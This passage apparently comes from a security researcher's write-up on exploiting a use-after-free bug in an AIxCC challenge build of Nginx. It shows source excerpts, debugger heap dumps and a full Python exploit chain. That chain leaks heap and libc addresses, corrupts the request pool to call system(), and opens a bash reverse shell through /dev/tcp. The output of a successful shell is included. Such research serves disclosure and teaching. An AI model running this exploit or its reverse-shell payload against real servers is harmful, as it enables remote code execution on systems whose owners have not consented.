if (rv == NGX_ERROR) {
ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
break;
}
if (rv == NGX_DECLINED) {
p = r->header_name_start;
r->lingering_close = 1;
if (p == NULL) {
ngx_log_error(NGX_LOG_INFO, c->log, 0,
"client sent too large request");
ngx_http_finalize_request(r,
NGX_HTTP_REQUEST_HEADER_TOO_LARGE);
break;
}
len = r->header_in->end - p;
if (len > NGX_MAX_ERROR_STR - 300) {
len = NGX_MAX_ERROR_STR - 300;
}
ngx_log_error(NGX_LOG_INFO, c->log, 0,
"client sent too long header line: \"%*s...\"",
len, r->header_name_start);
ngx_http_finalize_request(r,
NGX_HTTP_REQUEST_HEADER_TOO_LARGE);
break;
}
}
n = ngx_http_read_request_header(r);
if (n == NGX_AGAIN || n == NGX_ERROR) {
break;
}
}
/* the host header could change the server configuration context */
cscf = ngx_http_get_module_srv_conf(r, ngx_http_core_module);
rc = ngx_http_parse_header_line(r, r->header_in,
cscf->underscores_in_headers);
// [...]
/* rc == NGX_HTTP_PARSE_INVALID_HEADER */
ngx_log_error(NGX_LOG_INFO, c->log, 0,
"client sent invalid header line: \"%*s\\x%02xd...\"",
r->header_end - r->header_name_start,
r->header_name_start, *r->header_end);
ngx_http_finalize_request(r, NGX_HTTP_BAD_REQUEST);
break;
Another issue: the old content read in the client headers buffer would be copied to the large buffer, which contains the valid request line (and we don’t want those ASCII letters to corrupt the pool and request objects). This doesn’t happen in the case of r->state == 0
in ngx_http_alloc_large_header_buffer
. r->state
is set by parsing functions: if Nginx runs out of bytes halfway when parsing a field such as a header line, the state is kept and at least the data that is not completely parsed yet must be copied over to the new larger buffer.
if (r->state == 0) {
/*
* r->state == 0 means that a header line was parsed successfully
* and we do not need to copy incomplete header line and
* to relocate the parser header pointers
*/
r->header_in = b;
return NGX_OK; // this way we can avoid copying useless data to the big buffer
}
The result is that we control 0x1000 bytes from the overlapped pool. So we indirectly control the request object allocated in the pool.
gef➤ tele pool
0x00007abeb6e20000│+0x0000: 0x0000000000001337 ← $rdi
0x00007abeb6e20008│+0x0008: 0x0000000000001338
0x00007abeb6e20010│+0x0010: "nice!\r\n\r\n"
0x00007abeb6e20018│+0x0018: 0x000000000000000a ("\n"?)
0x00007abeb6e20020│+0x0020: 0x0000000000000fb0
0x00007abeb6e20028│+0x0028: 0x00007abeb6e20000 → 0x0000000000001337
0x00007abeb6e20030│+0x0030: 0x0000000000000000
0x00007abeb6e20038│+0x0038: 0x0000000000000000
0x00007abeb6e20040│+0x0040: 0x0000000000000000
0x00007abeb6e20048│+0x0048: 0x00007abeb6e1e060 → 0x0000000000000004
gef➤
0x00007abeb6e20050│+0x0050: 0x0000000000000000
0x00007abeb6e20058│+0x0058: 0x0000000000000001
0x00007abeb6e20060│+0x0060: 0x0000000000000000
0x00007abeb6e20068│+0x0068: 0x0000000050545448 ("HTTP"?)
0x00007abeb6e20070│+0x0070: 0x00007abeb6e7f600 → 0x00007abeb6e20050 → 0x0000000000000000
0x00007abeb6e20078│+0x0078: 0x00007abeb6e20b20 → 0x0000000000000000
0x00007abeb6e20080│+0x0080: 0x00007abeb6e4dc88 → 0x00007abeb6e4e0d8 → 0x00007abeb6e4e378 → 0x00007abeb6e60470 → 0x00007abeb6e4fe38 → 0x0000000000000000
0x00007abeb6e20088│+0x0088: 0x00007abeb6e60190 → 0x00007abeb6e60470 → 0x00007abeb6e4fe38 → 0x0000000000000000
0x00007abeb6e20090│+0x0090: 0x00007abeb6e60300 → 0x00007abeb6e60518 → 0x0000000000000000
0x00007abeb6e20098│+0x0098: 0x00005c095e67275a → <ngx_http_block_reading+0000> endbr64
gef➤ p *pool
$4 = {
d = {
last = 0x1337 <error: Cannot access memory at address 0x1337>,
end = 0x1338 <error: Cannot access memory at address 0x1338>,
next = 0xd0a0d216563696e,
failed = 0xa
},
max = 0xfb0,
current = 0x7abeb6e20000,
chain = 0x0,
large = 0x0,
cleanup = 0x0,
log = 0x7abeb6e1e060
}
What should we write in order to hijack the control flow? Whatever we injected can’t be a valid header, so Nginx will finalise the request with ngx_http_finalize_request
and I noticed there is a function pointer in (controlled) r
that is invoked. The exploit has to fix all the corrupted pointers that are accessed before invoking this handler.
if (r != r->main && r->post_subrequest) {
rc = r->post_subrequest->handler(r, r->post_subrequest->data, rc); // XXXR3: inject here
}
We inject the address of system
in libc and a pointer to a reverse shell string, which is injected in the corrupted pool.
system('/bin/sh\x00')
would return immediately because Nginx closed stdin
.
How can we leak addresses to the heap and libc? One observation I made is that crashing the worker process won’t re-randomise the heap and libc addresses, so in theory, we can brute-force the addresses. Rather than brute-forcing, I realised that sometimes we can leak an address to a pool-allocated object in the vulnerable pool using this same bug only if we compile with O3
. This is not reliable tho. Another idea is that we can still chain the CPV11 bug to make a good guess of the vulnerable pool address. Then we can make a good guess of libc too.
The more stable exploit
The leaked address from CPV11 points to a heap address. Using that we can guess the heap base (eg. 0x000075feb7000000
), the pool address and the libc address. I tested the offsets by restarting many times Nginx, which will randomise the addresses. However, in practice, we can also wisely bruteforce the addresses given that crashing worker processes won’t re-randomise and we have a heap leak to start with.
0x000075feb7000000 0x000075feb7800000 0x0000000000800000 rw-
0x000075feb7800000 0x000075feb789d000 0x000000000009d000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb789d000 0x000075feb79e5000 0x0000000000148000 r-x /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb79e5000 0x000075feb7a6c000 0x0000000000087000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a6c000 0x000075feb7a77000 0x000000000000b000 r-- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a77000 0x000075feb7a7a000 0x0000000000003000 rw- /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
0x000075feb7a7a000 0x000075feb7a7e000 0x0000000000004000 rw-
0x000075feb7b17000 0x000075feb7b27000 0x0000000000010000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7b27000 0x000075feb7ba6000 0x000000000007f000 r-x /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7ba6000 0x000075feb7bfe000 0x0000000000058000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7bfe000 0x000075feb7bff000 0x0000000000001000 r-- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7bff000 0x000075feb7c00000 0x0000000000001000 rw- /usr/lib/x86_64-linux-gnu/libm.so.6
0x000075feb7c00000 0x000075feb7c28000 0x0000000000028000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7c28000 0x000075feb7db0000 0x0000000000188000 r-x /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7db0000 0x000075feb7dff000 0x000000000004f000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7dff000 0x000075feb7e03000 0x0000000000004000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x000075feb7e03000 0x000075feb7e05000 0x0000000000002000 rw- /usr/lib/x86_64-linux-gnu/libc.so.6
With a configuration file like (simplified from Nginx AIxCC):
remote_admin off;
events {
}
mail {
auth_http http://127.0.0.1:1025;
xclient off;
timeout 3600s;
server {
listen 2525;
protocol smtp;
smtp_auth none;
}
}
http {
large_client_header_buffers 4 4096;
server {
listen 127.0.0.1:8080;
server_name localhost;
location /host_specs {
return 200 "Host Specifications:\n$host_specs";
}
}
}
The full exploit tested in Ubuntu 24.04 is:
import socket
from pwn import *
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
host = '127.0.0.1'
leak_vuln_trigger = b'GET /host_specs HTTP/1.1\r\nHost: localhost\r\nConnection: Close\r\n\r\n'
vuln_trigger = b'NOOP f f f f f f f f f f f\r\n'
def tcp_conn(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect( (host, port) )
return s
def read_data(s):
return s.makefile(mode='rb').read()
# 1. Leak using CPV11
s = tcp_conn(host, 8080)
payload = b'GET /host_specs HTTP/1.1' + b'\r\n'
payload += b'Host: localhost' + b'\r\n'
payload += b'Connection: Close' + b'\r\n'
payload += b'Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;' + b'\r\n'
payload += b'\r\n'
s.send(payload)
s.send(leak_vuln_trigger)
response1 = read_data(s)
# print(response1)
leak = u64(response1.split(b'111.111.111.111')[1][0:6] + b'\0\0')
log.info(f'Leaked address = {hex(leak)}')
page_base = leak - 0x41d0a0
log.info(f'Page base = {hex(page_base)}')
# guess (we can change it to brute force wisely)
heap_address = page_base + 0x423000
libc.address = page_base + 0xc00000
log.info(f'Pool address = {hex(heap_address)}')
log.info(f'LIBC address = {hex(libc.address)}')
# 2. Trigger the CPV17 vuln twice
s = tcp_conn(host, 2525)
s.send(vuln_trigger)
s.close()
s = tcp_conn(host, 2525)
s.send(vuln_trigger)
s.close()
log.info('Execute: nc -lvnp 4444')
pause()
# 3. Overwrite a part of the pool object and the HTTP request object
s = tcp_conn(host, 8080)
request_line_base_len = len(b'GET / HTTP/1.1\r\n')
request_line = b'GET /' + b'A' * (0x400 - request_line_base_len) + b' HTTP/1.1\r\n'
# +0x88 : srv_conf
# +0xc8 : header_in
# +0x470 : post_subrequest
payload = b'bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"\0'
request_headers = b''.join((
p64(0x1337) * ((0x50) // 8),
payload,
b'A' * (0x88 - 0x50 - len(payload)),
p64(heap_address + 0x88), # srv_conf (whatever pointed X if X+0x90 is a valid address)
b'B' * (0xc8 - 0x88 - 0x8),
p64(heap_address + 0xc8), # headers_in.pos (whatever, eg. itself)
p64(heap_address + 0xd0), # headers_in.last (greater than .pos)
p64(0x1338) * ((0x470 - 0xc8 - 0x10) // 8),
p64(heap_address + 0x470 + 0x8), # fake post_subrequest
p64(libc.sym['system']),
p64(0x1337),
))
payload = request_line + request_headers + b'\r\n\r\n'
s.send(payload)
response2 = read_data(s)
print(response2)
s.close()
$ python exploit_chain.py
[*] Leaked address = 0x7574e1a1d0a0
[*] Page base = 0x7574e1600000
[*] Pool address = 0x7574e1a23000
[*] LIBC address = 0x7574e2200000
[*] Execute: nc -lvnp 4444
[*] Paused (press any to continue)
Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 41906
bash: cannot set terminal process group (136506): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
roundofthree@ubuntu:/tmp/cores$
Some comments on the exploitability of Nginx UAF bugs
Firstly, most objects and buffers are allocated from the pool allocator (ngx_palloc
calls). So it’s hard to find heap gadgets allocated from the system allocator of the wanted size (using ngx_alloc
).
Secondly, pool-allocated objects are never freed back into the pool. They are freed when the associated pool block is freed, that is when the pool is destroyed. Since objects are slices of a pool block, the exploitation technique of overlapping same-size chunks doesn’t apply here: the granularity of allocations is the pool size. If we want to overlap a dangling pointer to an object with another object, we need to: 1) overlap the destroyed pool block of the dangling pointer and the pool block of the victim object, 2) the vulnerable object and the victim object must be in the same pool offset.
Rather than corrupting an object allocated in the pool, the exploit for CPV17 relies on corrupting the pool itself to corrupt ngx_http_request_t
to achieve RCE.
Acknowledgements
Prof Robert N. M. Watson, for offering advice and ideas and giving me the opportunity to work on CHERI (although this is not about CHERI, it was derived from a CHERI-related project).
HackerChai, for the many conversations on bugs, reviewing drafts and helping me progress in this field.